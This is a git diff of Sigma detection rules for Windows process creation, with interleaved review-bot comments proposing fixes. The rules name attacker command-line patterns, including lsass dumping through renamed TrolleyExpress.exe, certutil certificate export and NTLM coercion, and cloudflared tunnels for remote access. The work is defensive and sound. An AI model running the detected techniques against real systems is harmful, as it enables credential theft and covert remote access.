@@ -1,11 +1,10 @@ title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the files are located in potentially suspicious locations +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -25,14 +24,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more suspicious locations to increase coverage - \AppData\Roaming\ - \Desktop\ - \Local\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml index c2fa37081..15cc19fef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml 
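Review bot: The selection holding the path fragments (`\AppData\Roaming\`, `\Desktop\`, `\Local\Temp\`) in the second hunk is named `selection_extension`, evidently carried over from the sibling `proc_creation_win_certutil_encode_susp_extensions.yml` rule, which is misleading in a rule titled "File In Suspicious Location". Renaming it to `selection_paths:` is safe because the condition is `all of selection_*`, so no other line changes. The new `# Note: Add more suspicious locations to increase coverage` comment would be more actionable if it named the usual candidates, e.g. `# e.g. \Users\Public\, \ProgramData\, \Windows\Temp\`, assuming they are not already further down the list outside this hunk.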
@@ -1,12 +1,10 @@ title: Certificate Exported Via Certutil.EXE id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 status: test -description: Detects the execution of the certutil with the "exportPFX" flag which - allows the utility to export certificates. +description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. references: - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 modified: 2023/02/20 tags: @@ -21,15 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-exportPFX ' - '/exportPFX ' condition: process_creation and (all of selection_*) falsepositives: - - There legitimate reasons to export certificates. Investigate the activity to - determine if it's benign + - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml index e0a7cd60c..beea6567b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml 
@@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -syncwithWU ' - ' \\\\' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml index eb82ddc27..911267916 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml @@ -1,8 +1,7 @@ title: Console CodePage Lookup Via CHCP id: 7090adee-82e2-4269-bd59-80691e7c6338 status: experimental -description: Detects use of chcp to look up the system locale value as part of host - discovery +description: Detects use of chcp to look up the system locale value as part of host discovery references: - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp @@ -27,14 +26,13 @@ detection: - ' /r ' - ' /k ' Image|endswith: \chcp.com - CommandLine|endswith: + CommandLine|endswith: - chcp - 'chcp ' - 'chcp ' condition: process_creation and selection falsepositives: - - During Anaconda update the 'conda.exe' process will eventually execution the - 'chcp' command. + - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command. - Discord was seen using chcp to look up code pages level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml index 693db972c..12264b46f 100644 
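Review bot: `selection_cli` in the NTLM-coercion hunk only matches the dash form `' -syncwithWU '`, whereas the other certutil rules in this same patch (`-addstore`/`/addstore`, `-decode`/`/decode`, `-encode`/`/encode`) list both prefixes, and certutil accepts `/syncwithWU` just the same — so the slash form currently evades the rule. Because the existing block uses `contains|all`, the two spellings cannot simply be appended (both would then be required); split the switch and the UNC marker into separate selections, which the existing `all of selection_*` condition already ANDs together. The enclosing `detection` block starts before this hunk, so check that no other `selection_*` key is affected by the rename.
```yaml
    selection_cli_flag:
        CommandLine|contains:
            - ' -syncwithWU '
            - ' /syncwithWU '
    selection_cli_unc:
        CommandLine|contains: ' \\\\'
    # … unchanged: condition: process_creation and (all of selection_*) …
```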
--- a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml @@ -1,8 +1,7 @@ title: Suspicious CodePage Switch Via CHCP id: c7942406-33dd-4377-a564-0f62db0593a3 status: test -description: Detects a code page switch in command line or batch scripts to a rare - language +description: Detects a code page switch in command line or batch scripts to a rare language references: - https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers - https://twitter.com/cglyer/status/1183756892952248325 @@ -22,14 +21,17 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \chcp.com - CommandLine|endswith: - - ' 936' - - ' 1258' + CommandLine|endswith: + - ' 936' # Chinese + # - ' 1256' # Arabic + - ' 1258' # Vietnamese + # - ' 855' # Russian + # - ' 866' # Russian + # - ' 864' # Arabic condition: process_creation and selection fields: - ParentCommandLine falsepositives: - - Administrative activity (adjust code pages according to your organization's - region) + - Administrative activity (adjust code pages according to your organization's region) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml b/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml index 74b3ae8bb..3d3f3af5c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml 
@@ -1,16 +1,10 @@ title: Deleted Data Overwritten Via Cipher.EXE id: 4b046706-5789-4673-b111-66f25fe99534 status: test -description: 'Detects usage of the "cipher" built-in utility in order to overwrite - deleted data from disk. - - Adversaries may destroy data and files on specific systems or in large numbers - on a network to interrupt availability to systems, services, and network resources. - - Data destruction is likely to render stored data irrecoverable by forensic techniques - through overwriting files or data on local and remote drives - - ' +description: | + Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. + Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. + Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive author: frack113 @@ -28,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: CIPHER.EXE - - Image|endswith: \cipher.exe + - OriginalFileName: CIPHER.EXE + - Image|endswith: \cipher.exe selection_cli: - CommandLine|contains: ' /w:' + CommandLine|contains: ' /w:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml b/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml index 48130b964..cab8622ce 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml 
@@ -1,8 +1,7 @@ title: Process Access via TrolleyExpress Exclusion id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 status: test -description: Detects a possible process memory dump that uses the white-listed Citrix - TrolleyExpress.exe filename as a way to dump the lsass process memory +description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.youtube.com/watch?v=Ie831jF0bb0 @@ -23,20 +22,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter - \TrolleyExpress 7 - \TrolleyExpress 8 - \TrolleyExpress 9 - \TrolleyExpress.exe 7 - \TrolleyExpress.exe 8 - \TrolleyExpress.exe 9 + # Common dumpers - '\TrolleyExpress.exe -ma ' renamed: Image|endswith: \TrolleyExpress.exe filter_renamed: OriginalFileName|contains: CtxInstall filter_empty: - OriginalFileName: null + OriginalFileName: condition: process_creation and (selection or ( renamed and not 1 of filter* )) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml index 2570a42c6..ff7b85d97 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml 
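Review bot: The new comment in the second hunk says the rule assumes an lsass.exe PID "between 700 and 999", but `contains` with `\TrolleyExpress 7` / `8` / `9` actually matches any PID whose first digit is 7, 8 or 9 (7, 70, 7000, …) and silently misses lsass on hosts where its PID is four digits, which does occur; the comment should state the real assumption and its gap, e.g. `# Matches a bare PID argument starting with 7, 8 or 9 (typical lsass.exe PIDs); four-digit lsass PIDs and other prefixes are not covered`. Separately, `filter_empty` (now written as a bare `OriginalFileName:` key, i.e. null) excludes events where the field is absent, so a renamed dumper with its version resource stripped would only be caught if the log source records `-` rather than null — worth confirming for the Sysmon channel this rule targets before relying on that filter.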
@@ -1,9 +1,7 @@ title: Data Copied To Clipboard Via Clip.EXE id: ddeff553-5233-4ae9-bbab-d64d2bd634be status: test -description: Detects the execution of clip.exe in order to copy data to the clipboard. - Adversaries may collect data stored in the clipboard from users copying information - within or between applications. +description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md @@ -22,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \clip.exe - - OriginalFileName: clip.exe + - Image|endswith: \clip.exe + - OriginalFileName: clip.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml index 4b00e56d8..6d92c539d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml @@ -1,10 +1,8 @@ title: Cloudflared Portable Execution id: fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd status: experimental -description: 'Detects the execution of the "cloudflared" binary from a non standard - location. - - ' +description: | + Detects the execution of the "cloudflared" binary from a non standard location. references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml index 1e8923fa6..8831b1df5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml @@ -1,20 +1,15 @@ title: Cloudflared Quick Tunnel Execution id: 222129f7-f4dc-4568-b0d2-22440a9639ba related: - - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a - type: similar - - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 - type: similar + - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a + type: similar + - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 + type: similar status: experimental -description: 'Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be - used to tunnel local services such as HTTP, RDP, SSH and SMB. - - The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, - following a call to api[.]trycloudflare[.]com. - +description: | + Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. + The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware. - - ' references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared 
@@ -34,58 +29,61 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cloudflared.exe - - \cloudflared-windows-386.exe - - \cloudflared-windows-amd64.exe - - Hashes|contains: - - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 - - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 - - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 - - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 - - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 - - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 - - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 - - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a - - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 - - SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 - - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 - - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac - - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f - - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d - - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 - - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b - - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f - - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 - - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 - - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f - - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 - - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c - - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f - - 
SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 - - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 - - SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 - - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c - - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 - - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f - - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad - - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 - - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 - - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 - - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 - - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f - - SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 - - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 - - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + - Image|endswith: + - \cloudflared.exe + - \cloudflared-windows-386.exe + - \cloudflared-windows-amd64.exe + - Hashes|contains: + - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 + - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 + - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 + - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 + - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 + - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 + - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 + - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a + - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 + - 
SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 + - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 + - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac + - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f + - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d + - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 + - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b + - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f + - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 + - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 + - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f + - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 + - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c + - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f + - SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 + - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 + - SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 + - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c + - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 + - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f + - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad + - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 + - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 + - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 + - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 + - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f + - 
SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 + - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 + - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + # Note: + # Accounts for the cloudflared binaries being renamed + # `tunnel` is optional, but has been included to reduce the possibility of parameter collision when not observed with known binary names selection_param: - - CommandLine|contains|all: - - -url - - tunnel - - CommandLine|contains: - - .exe -url - - .exe --url + - CommandLine|contains|all: + - -url + - tunnel + - CommandLine|contains: + - .exe -url + - .exe --url selection_other: - CommandLine|contains|all: + CommandLine|contains|all: - -url - -no-autoupdate condition: process_creation and ((selection_img and selection_param) or selection_other) diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml index fd7fbd453..0d5c9f250 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml @@ -1,8 +1,7 @@ title: Cloudflared Tunnel Connections Cleanup id: 7050bba1-1aed-454e-8f73-3f46f09ce56a status: experimental -description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" - flag in order to cleanup tunnel connections. +description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. references: - https://github.com/cloudflare/cloudflared - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps 
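Review bot: The `Hashes|contains: SHA256=...` alternative in selection_img only fires when the Sysmon configuration records SHA256 — the `Hashes` field carries whichever algorithms `HashAlgorithms` enables — so on deployments hashing with MD5 or SHA1 only, the renamed-binary coverage silently falls back to the `Image|endswith` names, and nothing in the rule says so. The new Note block is the natural place for it: `# Note: Hash matching requires SHA256 in the Sysmon HashAlgorithms configuration; the list is a snapshot of known releases and needs updating as new cloudflared builds ship.` The hash list itself is only re-indented by this commit.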
@@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml index d38e42a6b..df38a288a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml @@ -1,9 +1,7 @@ title: Cloudflared Tunnel Execution id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 status: experimental -description: Detects execution of the "cloudflared" tool to connect back to a tunnel. - This was seen used by threat actors to maintain persistence and remote access - to compromised networks. +description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. references: - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group - https://github.com/cloudflare/cloudflared @@ -25,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml index b54f9214b..a65408f0b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml 
@@ -1,19 +1,12 @@ title: Change Default File Association Via Assoc id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 related: - - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 - type: similar + - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 + type: similar status: test -description: 'Detects file association changes using the builtin "assoc" command. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects file association changes using the builtin "assoc" command. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md author: Timur Zinniatullin, oscd.community @@ -31,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: assoc + CommandLine|contains: assoc condition: process_creation and (all of selection_*) fields: - Image 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml index 0bd13fd77..12c6d6394 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml 
@@ -1,20 +1,12 @@ title: Change Default File Association To Executable Via Assoc id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 related: - - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 - type: derived + - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 + type: derived status: test -description: 'Detects when a program changes the default file association of any extension - to an executable. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects when a program changes the default file association of any extension to an executable. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc author: Nasreddine Bencherchali (Nextron Systems) 
@@ -32,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'assoc ' - exefile filter: - CommandLine|contains: .exe=exefile + CommandLine|contains: .exe=exefile condition: process_creation and (all of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml index c16912930..114199e85 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml @@ -1,8 +1,7 @@ title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE id: 044ba588-dff4-4918-9808-3f95e8160606 status: experimental -description: Detects usage of the copy builtin cmd command to copy files with the - ".dmp"/".dump" extension from a remote share +description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share references: - 